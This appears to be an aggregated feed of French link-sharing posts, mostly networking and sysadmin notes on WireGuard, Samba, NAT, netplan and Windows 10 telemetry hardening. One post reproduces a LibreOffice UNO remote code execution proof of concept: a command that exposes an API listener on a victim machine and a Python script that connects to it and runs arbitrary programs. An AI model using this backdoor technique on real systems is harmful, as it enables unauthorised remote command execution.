96048 shaared links

Shaarli Flux River

JSON RSS

Use title: to search only in item titles, feed: for feeds name or tag: for categories.

Oros links Solid : le pari du « père du web » pour décentraliser le net et redonner le pouvoir aux internautes - Tech - Numerama
https://github.com/inrupt
Permalink
Oros links Building a simple VPN with WireGuard with a Raspberry Pi as Server // Andreas Happe
via https://dooby.fr/links/?ytADoA
Permalink
Oros links ip-forwarding NSE Script
sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'
Permalink
Les liens d'Eorn La fibre pour tous en Bretagne - Bretagne Très Haut Débit

Permalien
Oros links media.ccc.de -Hamnet – introduction into a wireless backbone
Réseau internet des radioamateurs
Permalink
Tibiaster djanybekensis « Oeuf de feu » par martouf | Redbubble

Permalink
Oros links Samba Optimization and Speed Tuning @ Calomel.org
# /etc/samba/smb.conf
socket options = TCP_NODELAY IPTOS_LOWDELAY SO_RCVBUF=65536 SO_SNDBUF=65536
Permalink
Oros links Samba Optimization and Speed Tuning @ Calomel.org
# /etc/samba/smb.conf
read raw = Yes
write raw = Yes
socket options = TCP_NODELAY IPTOS_LOWDELAY SO_RCVBUF=131072 SO_SNDBUF=131072
#socket options = TCP_NODELAY IPTOS_LOWDELAY SO_RCVBUF=65536 SO_SNDBUF=65536
min receivefile size = 16384
use sendfile = Yes
aio read size = 16384
aio write size = 16384
strict locking = no
Permalink
Oros links Wireguard - Debian Wiki
https://wiki.debian.org/Wireguard
https://www.wireguard.com/install/
Permalink
Oros links Wireguard - Debian Wiki
https://angristan.xyz/how-to-setup-vpn-server-wireguard-nat-ipv6/
https://wiki.debian.org/Wireguard
https://www.wireguard.com/install/
Permalink
Liens Ecyseo Using VLANs for Network Isolation - RouterSecurity.org

Créer un VLAN (Virtual Network).
Permalink

Les liens d'Eorn Remplacer la Livebox d'Orange par un routeur sous Linux | Vincent Bernat
via https://shaar.libox.fr/?48O5Cg
Permalien
Les liens d'Eorn Les réseaux : présentation générale - Les réseaux de zéro • Tutoriels • Zeste de Savoir

Permalien
Les liens d'Eorn p2p internals #1 • Billets • Zeste de Savoir

Permalien
Shaarli de Riduidel An always-available, online-capable Raspberry Pi in your pocket
Donc si j'ai bien compris, le Raspberry est connecté au Mac par l'USB pour le courant et le réseau. Et ne se connecte à internet que quand le mac y est connecté. Je trouve ça génial !
Permalink
Tibiaster djanybekensis High quality digital map prints from a par GrasshopperGeography
Robert Szucs
Permalink
Oros links Playing battleships over BGP
Jouer à la bataille naval via BGP 0_o
https://github.com/benjojo/bgp-battleships
Permalink
Oros links Solid · GitHub
«Re-decentralizing the web. Everything MIT licensed.»
https://github.com/solid/information
https://solidproject.org/
Permalink
Oros links Note: NAT
```
apt install -y iptables-persistent
# règles dans /etc/iptables/rules.v4 et /etc/iptables/rules.v6
echo 1 >/proc/sys/net/ipv4/ip_forward
sed -i "s/#net.ipv4.ip_forward=1/net.ipv4.ip_forward=1/" /etc/sysctl.conf
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
```
Permalink
Oros links How to install Ntopng Network Monitor on Debian 10
via https://book.knah-tsaeb.org/?9FzTeQ
Permalink
Shaarli de Riduidel Trisha Gee sur Twitter : "Hey ladies (everyone else who needs to hear this): Be cheeky and ask for things. For yourself, for your network, for those you mentor. We might feel bad "abusing" our position/network/privilege, but others are doing this anyway.
Effectivement : n'hésitez jamais à demander ni à utiliser le réseau, parce que tout le monde le fait !
Permalink
OpenNews Facebook, WhatsApp Will Have to Share Messages With U.K. - Bloomberg
via https://sebsauvage.net/links/?FM9WfQ
(Permalink)
Liens Ecyseo C & F Éditions : Twitter & les gaz lacrymogènes, Forces et fragilités de la contestation connectée, Zeynep Tufekci

Les mouvements sociaux à travers le monde utilisent massivement les technologies numériques. Zeynep Tufekci était présente sur la place Tahrir et en Tunisie lors des printemps arabes, à Istanbul pour la défense du parc Gezi, dans les rues de New York avec Occupy et à Hong-Kong lors du mouvement des parapluies. Elle y a observé les usages des téléphones mobiles et des médias sociaux et nous en propose ici un récit captivant.

Les réseaux numériques permettent de porter témoignage et d'accélérer les mobilisations. Ils aident les mouvements à focaliser les regards sur leurs revendications. Cependant, l'espace public numérique dépend des monopoles de l'économie du web. Leurs algorithmes, choisis pour des raisons économiques, peuvent alors affaiblir l'écho des contestations. Au delà de leur puissance pour mobiliser et réagir, faire reposer la construction des mouvements sur ces technologies fragilise les organisations quand il s'agit de les pérenniser, quand il faut négocier ou changer d'objectif tactique.

De leur côté, les pouvoirs en place ont appris à utiliser les médias numériques pour créer de la confusion, de la désinformation, pour faire diversion, et pour démobiliser les activistes, produisant ainsi résignation, cynisme et sentiment d'impuissance. Une situation qui montre que les luttes sociales doivent dorénavant intégrer dans leur stratégie les enjeux de l'information et de la communication aux côtés de leurs objectifs spécifiques.

Zeynep Tufekci

Zeynep Tufekci est professeure à l'Université de Caroline du Nord (Etats-Unis). Née en Turquie, elle a débuté comme développeuse informatique avant de s'intéresser aux sciences humaines et sociales. Elle se définit dorénavant comme une « techno-sociologue ». Chroniqueuse régulière pour The Atlantic et The New York Times, ses interventions lors des conférences TED sont largement diffusées et montrent sa capacité à captiver un public en soulevant des questions essentielles sur les usages des médias sociaux.

« La capacité de ZeynepTufekci à concilier ses savoirs d'activiste et de chercheuse permet de relever des points que très peu peuvent entrevoir. Son livre offre de nouvelles bases pour l'analyse des médias sociaux et des mobilisations politiques. » Rasha A. Abdulla.
Sommaire
Introduction
Première partie - L'émergence d'un mouvement

L'espace public connecté
Censure et attention
Gouvernance des sans-leaders
Cultures des mouvements
Deuxième partie - Les outils de l'activiste

Technologies et personnes
Plateformes et algorithmes
Noms et connexions
Troisième partie - Par delà les manifestations

Signaux de puissance et signaux aux puissants
Contre-attaque des autorités
Épilogue - L'ascension incertaine
Permalink

Liens du Parigot-Manchot Wake on LAN

Deux utilitaires (graphique et ligne de commande) pour réveiller plusieurs machines avec le protocole Wake on LAN
Permalien

Tibiaster djanybekensis Réseau Romand Ecopsychologie | L'écopsychologie en Suisse romande: entre théorie et pratique

Permalink
Shaarli ¦ Orangina Rouge Freediving and spearfishing Skype lessons - FreediveUK

“ Getting information off the Internet is like taking a drink from a fire hydrant. ”
– Mitchell Kapor

« Récupérer des informations depuis Internet, c'est comme boire un verre depuis une borne d'incendie. »
– Mitchell Kapor
Permalien

Tibiaster djanybekensis Kauri : la découverte qui change notre regard sur la forêt - Sciences et Avenir

Permalink
Oros links Monitoring serveurs - ZeroBin
Appel aux admin-systèmes :
Vous utilisez quoi pour monitorer votre parcs de serveurs ?

Dans mon cas, on as ~300 serveurs et ~2 000 services.
Utilisation de centreon, nagios et cactis.

Je suis entrain de regarder si je peux faire quelque chose de grafana mais ça ne semble pas pratique pour avoir une vue global avec envoi d'alertes.

Oros

-> https://ecirtam.net/zerobin/?93a778e504496981#DH1Vo/mdLay21dkES1MX8VAG5p5X2peVSfJ72ByhO8g=
Permalink
Oros links Monitoring serveurs - ZeroBin
Appel aux admin-systèmes :
Vous utilisez quoi pour monitorer votre parcs de serveurs ?

Dans mon cas, on as ~300 serveurs et ~2 000 services.
Utilisation de centreon, nagios et cactis.

Je suis entrain de regarder si je peux faire quelque chose de grafana mais ça ne semble pas pratique pour avoir une vue global avec envoi d'alertes.

Oros

-> https://ecirtam.net/zerobin/?93a778e504496981#DH1Vo/mdLay21dkES1MX8VAG5p5X2peVSfJ72ByhO8g=
Permalink
Oros links Note: Note interface réseau
# ifconfig et ip : bas niveau
# netplan et network-manager : niveau plus élevé

# A partir d'ubuntu 17 networking est remplacer par netplan
ll /etc/netplan/
# https://netplan.io/examples

# network-manager client
nmcli
nmcli device show
nmcli connection show

# fichiers de conf
ll /var/lib/NetworkManager
Permalink
Oros links Note: Note interface réseau
# ifconfig et ip : bas niveau
# netplan et network-manager : niveau plus élevé

# A partir d'ubuntu 17 networking est remplacer par netplan
ll /etc/netplan/
# https://netplan.io/examples

# network-manager client
nmcli
nmcli device show
nmcli connection show

# fichiers de conf
ll /var/lib/NetworkManager
Permalink
Les bons liens du Gégé Data Center Host to ToR Architecture | Cumulus Networks Documentation
Tibiaster djanybekensis Réseau régional pour la transition | Pôle Sud

Permalink
Tibiaster djanybekensis Les USA veulent protéger leurs réseaux électriques contre les cyberattaques à l'aide de technologies rétro comme des interrupteurs manuels

Permalink
Liens Ecyseo ONLYOFFICE 10.0 : créer les formulaires à remplir | memo-linux.com

Libre office en réseau
Permalink

Oros links Building an LTE Access Point with a Raspberry Pi - Andreas Happe: signal/noise

Permalink
Shaarli de Riduidel dnsfilter [Wiki de sebsauvage.net]
Merci sebsauvage ! Je m'en vais configurer ça dès ce soir !
Permalink
Tibiaster djanybekensis La Cagette : LesCoop

Permalink
Shaarli de Riduidel muesli/beehive: A flexible event/agent & automation system with lots of bees ?
Il semble bien que j'aie trouvé mon remplaçant à ifttt (dont certains éléments ... me déplaisent)
Permalink
/Yome/links Internet : une histoire de cables qui ne tiennent qu'à un fil
Les cables sous marins expliqués de A à Z
(Permalink)
Oros links Note : fréquence NTP - Le Hollandais Volant
sudo nano /etc/ntp.conf
> server ntp.ubuntu.com iburst
# devient :
> server ntp.ubuntu.com iburst minpoll 12 maxpoll 17

sudo systemctl restart ntp
Permalink
Les bons liens du Gégé BSDCan2017: pf+rdomains create splendid multi-tenancy firewalls
Les bons liens du Gégé BSDCan2015: Using routing domains / routing tables in a production network
Shaarli de Riduidel Blog Stéphane Bortzmeyer: RFC 5218: What Makes For a Successful Protocol?
Un article éminement intéressant sur le déploiement des protocoles ... Ca rejoint un truc dont je vais sans doute parler ... bientôt
Permalink
Oros links Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution
# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
Permalink
/Yome/links quakejs.com
Quake en JS... C'est ouf !
(Permalink)
Oros links GitHub - trimstray/the-book-of-secret-knowledge: A collection of awesome lists, manuals, blogs, hacks, one-liners, cli/web tools and more.
via https://shaarli.brihx.fr/?9Jb5xw
Permalink
Oros links Hex Packet Decoder
Pour analyser des packets IP
Permalink
Oros links TorrentParadise : Un nouveau tracker décentralisé impossible à stopper ? | UnderNews
https://fr.wikipedia.org/wiki/InterPlanetary_File_System
https://github.com/ipfs/ipfs

via https://liens.strak.ch/?JAgOIw
Permalink
Shaarli de Riduidel Ma charte éthique Twitter contre le harcèlement et pour des débats constructifs – Le blog de Guillaume Champeau
Ca résonne avec mon objectif de refaire de mes réseaux sociaux des endroits positifs, en arrêtant par exemple de retweeter des choses négatives
Permalink
Les liens de Brihx Baromètre FTTH - FFDN
(Permalink)
Les liens de Brihx Baromètre FTTH - FFDN

Permalink
Liens Ecyseo Geoffroy Couprie on Twitter: ""there's no cloud, it's just other people's servers". Yes but. there's no postal services, it's just other people's cars. No electrical network, just other people's power station. No phone service, just other people's network

Sauf que ce qu'il oublie de dire, c'est que les services postaux ne regardent pas le courrier qu'ils transportent (sous peine d'amendes lourdes), que l'électricité ne transporte pas de données (du moins dans son utilisation courante) et que le réseau téléphone, à l'origine, était un réseau de pair à pair et que toute écoute était interdite (watergate, miterrand gate).

Et si données il y a, elles ne font que transiter dans ces réseaux et elles n'y restent pas.

Alors que dans le "cloud", on ne sait pas ce qui s'y passe et les données sont stockées. On les donne et les autres se font un pognon de dingue dessus, à l'insu de notre plein gré.
Permalink

Shaarli de Riduidel Geoffroy Couprie on Twitter: ""there's no cloud, it's just other people's servers". Yes but. there's no postal services, it's just other people's cars. No electrical network, just other people's power station. No phone service, just other people's network
Très juste, tous ces réseaux existent et sont matéralisés. Certains nous intéressent moins que d'autres, c'est tout ... (et encore Geoffrey oublie le réseau de transport physique : routes, rails, ....)
Permalink
Liens Ecyseo media.ccc.de - What The Fax?!

Le Fax comme talon d'Achille d'un réseau...
Permalink

Shaarli de Riduidel IPv6 Christmas Display Uses 75 Internet’s Worth of Addresses | Hackaday
C'est un usage assez délirant de l'espace des adresses IPv6 ... Mais ça montre la taille totalement folle du truc
Permalink
Liens Ecyseo Blog Stéphane Bortzmeyer: RFC 8404: Effects of Pervasive Encryption on Operators

La vie privée sur l'Internet fait aujourd'hui l'objet d'innombrables attaques et l'une des techniques de défense les plus efficaces contre ces attaques est le chiffrement des données. Il protège également contre une autre menace, la modification des données en transit, comme le font certaines FAI (par exemple Orange Tunisie). Il y a de nombreuses campagnes de sensibilisation pour promouvoir le chiffrement (voir par exemple le RFC 7258), avec des bons résultats. Évidemment, ce chiffrement gène ceux qui voudraient espionner et modifier le trafic, et il fallait donc s'attendre à voir une réaction. Ce RFC est l'expression de cette réaction, du côté de certains opérateurs réseau, qui regrettent que le chiffrement empêche leurs mauvaises pratiques.
Permalink

kalvn's links Bloquer l'accès au net à un soft sous Nunux // /home/lord

Sous le coude.
Permalink

/Yome/links bzflag
En voilà un jeu en ligne qui a l'air cool et simple
(Permalink)
Oros links Wehe: Check Your ISP for Net Neutrality Violations
Pour tester la neutralité du réseau.
https://github.com/FangfanLi/wehe_desktop
Permalink
Oros links Bloquer l'accès au net à un soft sous Nunux // /home/lord
sudo ip netns add nonet
sudo ip netns exec nonet su $USER -c “<appli>"

via http://www.ascadia.net/links/?4ARzIA
Permalink
Oros links Note: Note: Mise sous écoute d'un windows 10 Partie 6. Confidentialité
Suite de https://ecirtam.net/links/?RSVxiA

Quelques références de documentations permettant de renforcer la confidentialité sous Windows 10 :
https://www.ssi.gouv.fr/entreprise/guide/restreindre-la-collecte-de-donnees-sous-windows-10/
https://www.ssi.gouv.fr/uploads/2017/01/np_securisation_windows10_collecte_de_donnees_v1.2.pdf

https://www.ssi.gouv.fr/particulier/guide/partir-en-mission-avec-son-telephone-sa-tablette-ou-son-ordinateur-portable/
https://www.ssi.gouv.fr/uploads/IMG/pdf/passeport_voyageurs_anssi.pdf

https://tuxicoman.jesuislibre.net/2018/03/etude-de-la-telemetrie-de-windows-10.html
https://tuxicoman.jesuislibre.net/blog/wp-content/uploads/Windows10_Telemetrie_1709.pdf (par la Direction Interrégionale de la Police Judiciaire de Bordeaux)
https://www.leblogduhacker.fr/le-guide-pour-securiser-votre-pc-apres-une-fraiche-installation-de-windows/

De ça, j'ai créé le script batch suivant (fichier windows10_config.bat) :
```
:: 2018-09-04
:: Script pour Windows 10
:: Ce script désactive :
:: - cortana
:: - la télémétrie
:: - la géolocalisation
:: - l'envoit de rapport d'erreur à Microsoft
:: - limite les pubs
:: - renforce la vie privée
:: Pour plus d'informations, voir les documents de référence :
:: https://tuxicoman.jesuislibre.net/blog/wp-content/uploads/Windows10_Telemetrie_1709.pdf
:: https://www.ssi.gouv.fr/entreprise/guide/restreindre-la-collecte-de-donnees-sous-windows-10/
::
reg add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\Experience\AllowCortana" /v "value" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "CortanaEnabled" /t REG_DWORD /d 0 /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "CortanaEnabled" /t REG_DWORD /d 0 /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "CanCortanaBeEnabled" /t REG_DWORD /d 0 /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "DeviceHistoryEnabled" /t REG_DWORD /d 0 /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "HistoryViewEnabled" /t REG_DWORD /d 0 /f
REG ADD "HKCU\Software\Microsoft\Speech_OneCore\Preferences" /v "VoiceActivationEnableAboveLockscreen" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "SearchboxTaskbarMode" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchPrivacy" /t REG_DWORD /d "3" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchSafeSearch" /t REG_DWORD /d "3" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search\CurrentPolicies" /v "AllowIndexingEncryptedStoresOrItems" /t REG_DWORD /d "0" /f
REG ADD "HKLM\Software\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\FirewallRules" /v {0417540B-8102-4F07-89FE-9EF163186848} /t REG_SZ /d "v2.26|Action=Block|Active=TRUE|Dir=Out| Protocol=6|App=%Windir%\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe| Name=Configuration Pare-feu Cortana|" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UnattendSettings\Windows Error Reporting" /v "DisableWER" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR" /v "Disable" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent" /v "DefaultConsent" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration" /v "Status" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "Value" /t REG_SZ /d "Deny" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E6AD100E-5F4E-44CD-BE0F-2265D88D14F5}" /v "Value" /t REG_SZ /d "Deny" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsAccessLocation" /t REG_DWORD /d "2" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsAccessLocation_UserInControlOfTheseApps" /t REG_MULTI_SZ /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsAccessLocation_ForceAllowTheseApps" /t REG_MULTI_SZ /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsAccessLocation_ForceDenyTheseApps" /t REG_MULTI_SZ /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocation" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableSensors" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SYSTEM\ControlSet001\Services\lfsvc" /v "Start" /t REG_DWORD /d "4" /f
REG ADD "HKLM\SYSTEM\ControlSet001\Services\lfsvc\Service\Configuration" /v "Status" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoCloudApplicationNotification" /t REG_DWORD /d "1" /f
REG ADD "HKCU\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "AITEnable" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "EnableConfigFlighting" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f
REG ADD "HKCU\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "ID" /f
REG ADD "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UnattendSettings\SQMClient" /v "CEIPEnable" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnabled" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
REG ADD "HKCU\software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Assistance\Client\1.0\Settings" /v "ImplicitFeedback" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Settings" /v "DisableSendGenericDriverNotFoundToWER" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SYSTEM\DriverDatabase\Policies\Settings" /v "DisableSendGenericDriverNotFoundToWER" /t REG_DWORD /d "1" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\PCHealth\HelpSvc" /v "Headlines" /t REG_DWORD /d "0" /f
```

Ce script reprend les points les plus basiques décrit dans ce document : https://tuxicoman.jesuislibre.net/blog/wp-content/uploads/Windows10_Telemetrie_1709.pdf
On pourrait en ajouter pleins d'autres.
Permalink
Shaarli ¦ Orangina Rouge Accès Internet en vol : Air France oublie la neutralité du Net sur le tarmac | La Quadrature du Net

J'imagine la situation pour d'autres « loueurs de tuyaux » (car un fournisseur d'accès à Internet n'est sensé que faire transiter des paquets numériques dans des câbles éthernet (pour vulgariser)) :

  • fournisseur d'eau : « Alors oui, on vous fournit de l'eau mais par contre, même si c'est de l'eau potable, vous n'avez pas le droit de la boire ; vous ne pouvez que laver votre voiture avec… »
  • fournisseur d'électricité : « Avec notre électricité vous ne pouvez pas utiliser d'outils électriques pour fabriquer du DIY ; vous n'avez le droit que de recharger votre voiture électrique… »
  • fournisseur de gaz : « Cuire des côtes de porc c'est ok, mais pas de poulet yassa ! »
  • fournisseur de chauffage : « Le chauffage c'est que pour la chambre des enfants, pas pour les ados (ces délinquants). »

Bref, faire un choix — même si c'est pour mettre en avant un partenaire commercial — reste politique !
Permalien

Shaarli ¦ Orangina Rouge Accès Internet en vol : Air France oublie la neutralité du Net sur le tarmac | La Quadrature du Net

J'imagine la situation pour d'autres « loueurs de tuyaux » (car un fournisseur d'accès à Internet n'est sensé que faire transiter des paquets numériques dans des câbles éthernet (pour vulgariser)) :

  • fournisseur d'eau : « Alors oui, on vous fournit de l'eau mais par contre, même si c'est de l'eau potable, vous n'avez pas le droit de la boire ; vous ne pouvez que laver votre voiture avec… »
  • fournisseur d'électricité : « Avec notre électricité vous ne pouvez pas utiliser d'outils électriques pour fabriquer du DIY ; vous n'avez le droit que de recharger votre voiture électrique… »
  • fournisseur de gaz : « Cuire des côtes de porc c'est ok, mais pas de poulet yassa ! »
  • fournisseur de chauffage : « Le chauffage c'est que pour la chambre des enfants, pas pour les ados (ces délinquants). »

Bref, faire un choix — même si c'est pour mettre en avant un partenaire commercial — reste politique !
Permalien

Les bons liens du Gégé FRAMEIP - Partage des connaissance du monde TCP/IP

Site dédié à la compréhension en détail des protocoles de communication des réseaux.
FrameIP.com ajoute plus de 300 vidéos à l’ensemble de ses documentations. Ainsi, pour chaque page du site, vous trouverez un ensemble de vidéos traitant le sujet qui vous intéresse.
Permalink

Oros links Security Onion
«Linux distro for intrusion detection, enterprise security monitoring, and log management »
https://github.com/Security-Onion-Solutions/security-onion
via https://shaar.libox.fr/?b9e4Hw
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 5. Carte
Suite de https://ecirtam.net/links/?YgWg9Q et https://ecirtam.net/links/?1wRTPw

Carte des emplacements des serveurs au quel se connecte Windows 10.
La liste des domaines qui sont positionnés est dispo ici : https://ecirtam.net/links/?1wRTPw
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 5. Carte
Suite de https://ecirtam.net/links/?YgWg9Q et https://ecirtam.net/links/?1wRTPw

Carte des emplacements des serveurs au quel se connecte Windows 10.
La liste des domaines qui sont positionnés est dispo ici : https://ecirtam.net/links/?1wRTPw

Note : il y a un point en Suisse. C'est un serveur qui est quelque part en Europe mais dont l'on a pas les coordonnées GPS. Du coup, GeoIP me l'a positionné en Suisse.
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 5. Carte
Suite de https://ecirtam.net/links/?YgWg9Q et https://ecirtam.net/links/?1wRTPw

Carte des emplacements des serveurs au quel se connecte Windows 10.
La liste des domaines qui sont positionnés est dispo ici : https://ecirtam.net/links/?1wRTPw

Note : il y a un point en Suisse. C'est un serveur qui est quelque part en Europe mais dont l'on a pas les coordonnées GPS. Du coup, GeoIP me l'a positionné en Suisse.

Suite : https://ecirtam.net/links/?biwg9Q
Permalink
Les bons liens du Gégé EVPN : expérimentation et cas d’usages

